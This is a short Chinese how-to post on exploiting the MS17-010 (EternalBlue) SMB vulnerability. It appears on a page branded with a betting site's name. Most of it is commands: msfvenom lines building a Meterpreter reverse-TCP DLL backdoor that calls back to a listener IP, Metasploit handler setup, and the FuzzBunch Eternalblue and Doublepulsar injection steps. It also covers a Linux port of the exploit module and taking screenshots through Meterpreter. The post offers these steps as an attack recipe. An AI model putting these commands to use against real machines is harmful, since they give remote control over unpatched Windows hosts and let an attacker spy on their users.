必威体育Betway必威体育官网
当前位置:首页 > IT技术

ms17010

时间:2019-06-16 03:45:19来源:IT技术作者:seo实验室小编阅读:81次「手机版」
 

ms17010

Windows上原生payload

fb.py
设置目标IP
设置本机IP
no
项目新名称:随便写
fb > use Smbtouch 检测哪些漏洞可用

生成后门

msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8089 -f dll >reverse.dll

msf监听:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
set lhost
set lport
run

选择永恒之蓝漏洞

fb Touch (Smbtouch) > use Eternalblue
target选1,win7
fb Special (Eternalblue) > use Doublepulsar
选2,run dll

msf-windows.msi

工具:链接

Linux-msf移植payload

安装wine32:

dpkg –add-architecture i386 && apt-get install wine32

克隆项目到 /root

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

复制到metasploit目录 (usr/share)

msf>reload_all

msf>use eternalblue_doublepulsar
msf>set RHOST
msf>run
(报错,执行wine -h)

生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll

meterpreter>screenshot #截屏

相关阅读

利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)

前言 其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2--

分享到:

栏目导航

推荐阅读

热门阅读